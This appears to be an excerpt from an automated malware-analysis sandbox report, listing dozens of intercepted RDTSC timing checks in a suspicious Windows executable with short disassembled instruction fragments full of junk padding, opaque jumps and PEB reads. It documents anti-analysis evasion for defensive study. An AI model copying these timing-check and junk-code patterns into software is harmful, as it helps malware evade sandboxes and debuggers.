Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A5672B second address: A56747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05507502h 0x00000009 pop ecx 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A5E74E second address: A5E758 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A5E758 second address: A5E75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E24F5 second address: 9E24F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E24F9 second address: 9E24FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A66C45 second address: A66C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A66AAC second address: A66AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A66AB0 second address: A66AB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A6A1FC second address: A6A200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A6A200 second address: A6A20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0E05506CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A6A20C second address: A6A21C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E055074F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A6A21C second address: A6A220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A72493 second address: A7249E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A7249E second address: A724F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F0E05506CF7h 0x00000012 jng 00007F0E05506CE6h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jns 00007F0E05506CE6h 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0E05506CF3h 0x0000002f jmp 00007F0E05506CEAh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A72F0F second address: A72F2C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F0E055074F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F0E055074FEh 0x00000012 jnl 00007F0E055074F6h 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A72F2C second address: A72F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 pushad 0x00000008 jp 00007F0E05506CE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A76D74 second address: A76D8C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E05507502h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A76D8C second address: A76D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A76D90 second address: A76D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A76817 second address: A7685E instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E05506D01h 0x00000008 jmp 00007F0E05506CF9h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jo 00007F0E05506CF9h 0x00000018 jmp 00007F0E05506CF3h 0x0000001d push eax 0x0000001e push edx 0x0000001f js 00007F0E05506CE6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A88353 second address: A88364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jl 00007F0E055074F6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9926FB second address: 9926FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9926FF second address: 992726 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0E055074FFh 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0E055074FCh 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 992726 second address: 99274C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jbe 00007F0E05506CE6h 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0E05506CEFh 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 99274C second address: 992766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F0E055074F6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007F0E055074F6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9492C second address: A94954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF2h 0x00000009 jmp 00007F0E05506CF2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9BEF4 second address: A9BF02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F0E055074F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9BF02 second address: A9BF06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9C342 second address: A9C34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9C7A3 second address: A9C7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9C7AA second address: A9C7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0E055074F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9C7B4 second address: A9C80F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF4h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0E05506CEEh 0x00000011 jmp 00007F0E05506CF2h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0E05506CEFh 0x00000020 jng 00007F0E05506CECh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9FCA9 second address: A9FCE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E055074F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F0E055074FCh 0x00000010 popad 0x00000011 push eax 0x00000012 push esi 0x00000013 je 00007F0E055074F8h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop esi 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 pushad 0x00000021 jno 00007F0E055074F8h 0x00000027 push eax 0x00000028 push edx 0x00000029 ja 00007F0E055074F6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9FCE0 second address: A9FCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9FCE4 second address: A9FCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A9FCF2 second address: A9FCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: AA2CBE second address: AA2CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: AA4D2A second address: AA4D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F0E05506CE6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: AA4D38 second address: AA4D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507500h 0x00000007 jmp 00007F0E05507504h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: AA4D60 second address: AA4D7C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0E05506CF7h 0x00000008 jmp 00007F0E05506CF1h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA030F second address: 4DA0320 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 3DFC186Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA0320 second address: 4DA0333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA0333 second address: 4DA03A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushfd 0x00000006 jmp 00007F0E055074FBh 0x0000000b add esi, 6377FEBEh 0x00000011 jmp 00007F0E05507509h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a call dword ptr [7598188Ch] 0x00000020 mov edi, edi 0x00000022 push ebp 0x00000023 mov ebp, esp 0x00000025 push ecx 0x00000026 mov ecx, dword ptr [7FFE0004h] 0x0000002c mov dword ptr [ebp-04h], ecx 0x0000002f cmp ecx, 01000000h 0x00000035 jc 00007F0E05538FD5h 0x0000003b mov eax, 7FFE0320h 0x00000040 mov eax, dword ptr [eax] 0x00000042 mul ecx 0x00000044 shrd eax, edx, 00000018h 0x00000048 mov esp, ebp 0x0000004a pop ebp 0x0000004b ret 0x0000004c pushad 0x0000004d mov bx, si 0x00000050 call 00007F0E05507508h 0x00000055 mov edx, eax 0x00000057 pop esi 0x00000058 popad 0x00000059 pop ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F0E055074FFh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA03A1 second address: 4DA03BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA03BE second address: 4DA03C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA03C3 second address: 4DA0286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 74D88A90h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ret 0x0000000d nop 0x0000000e xor esi, eax 0x00000010 lea eax, dword ptr [ebp-10h] 0x00000013 push eax 0x00000014 call 00007F0E09EA3975h 0x00000019 mov edi, edi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0E05506CF3h 0x00000022 or cx, 491Eh 0x00000027 jmp 00007F0E05506CF9h 0x0000002c popfd 0x0000002d mov ecx, 28AC7AE7h 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 jmp 00007F0E05506CEAh 0x00000039 push eax 0x0000003a jmp 00007F0E05506CEBh 0x0000003f xchg eax, ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0E05506CF0h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA0286 second address: 4DA028A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA028A second address: 4DA0290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4DA0290 second address: 4DA02B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d call 00007F0E05507502h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5001B second address: 4D50040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, B1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50040 second address: 4D50045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50045 second address: 4D5008D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dx, 73CAh 0x0000000f pushfd 0x00000010 jmp 00007F0E05506CEBh 0x00000015 add ax, CE6Eh 0x0000001a jmp 00007F0E05506CF9h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5008D second address: 4D50091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50091 second address: 4D50097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50097 second address: 4D500E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 28h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E05507502h 0x00000015 sub ch, 00000048h 0x00000018 jmp 00007F0E055074FBh 0x0000001d popfd 0x0000001e call 00007F0E05507508h 0x00000023 pop esi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D500E2 second address: 4D50175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 mov dh, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr fs:[00000030h] 0x00000010 jmp 00007F0E05506CF5h 0x00000015 sub esp, 18h 0x00000018 jmp 00007F0E05506CEEh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F0E05506CF0h 0x00000023 push eax 0x00000024 jmp 00007F0E05506CEBh 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F0E05506CEBh 0x00000033 sub ax, 6EAEh 0x00000038 jmp 00007F0E05506CF9h 0x0000003d popfd 0x0000003e jmp 00007F0E05506CF0h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50175 second address: 4D5019E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E05507505h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5019E second address: 4D501A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D501A3 second address: 4D5021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E055074FDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d jmp 00007F0E055074FEh 0x00000012 push eax 0x00000013 jmp 00007F0E055074FBh 0x00000018 xchg eax, esi 0x00000019 jmp 00007F0E05507506h 0x0000001e mov esi, dword ptr [759B06ECh] 0x00000024 jmp 00007F0E05507500h 0x00000029 test esi, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F0E05507507h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5021A second address: 4D50220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50220 second address: 4D5023D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F0E0550857Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5023D second address: 4D50241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50241 second address: 4D50245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50245 second address: 4D5024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5024B second address: 4D502BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E05507508h 0x00000009 and si, 6668h 0x0000000e jmp 00007F0E055074FBh 0x00000013 popfd 0x00000014 mov ax, 645Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d push ecx 0x0000001e mov dl, C9h 0x00000020 pop ecx 0x00000021 pushfd 0x00000022 jmp 00007F0E05507509h 0x00000027 or ax, 4736h 0x0000002c jmp 00007F0E05507501h 0x00000031 popfd 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D502BD second address: 4D502C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D502C4 second address: 4D50326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0E055074FBh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 mov ah, bl 0x00000012 call 00007F0E055074FCh 0x00000017 pushfd 0x00000018 jmp 00007F0E05507502h 0x0000001d and ah, FFFFFFE8h 0x00000020 jmp 00007F0E055074FBh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 call dword ptr [75980B60h] 0x0000002e mov eax, 75F3E5E0h 0x00000033 ret 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0E05507502h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50326 second address: 4D5037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F0E05506CEDh 0x0000000b or ah, FFFFFFB6h 0x0000000e jmp 00007F0E05506CF1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 00000044h 0x00000019 jmp 00007F0E05506CEEh 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F0E05506CF7h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5037B second address: 4D503A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov bx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E05507509h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D503A3 second address: 4D503A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D503A9 second address: 4D503CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507503h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 523067D1h 0x00000014 push esi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D503CE second address: 4D5043A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0E05506CF4h 0x00000011 adc esi, 3B9F4088h 0x00000017 jmp 00007F0E05506CEBh 0x0000001c popfd 0x0000001d movzx eax, bx 0x00000020 popad 0x00000021 push dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F0E05506CECh 0x0000002c add esi, 50E5A2E8h 0x00000032 jmp 00007F0E05506CEBh 0x00000037 popfd 0x00000038 mov bx, si 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5043A second address: 4D50441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 16h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50441 second address: 4D50454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr fs:[00000030h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50454 second address: 4D50458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50458 second address: 4D5045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
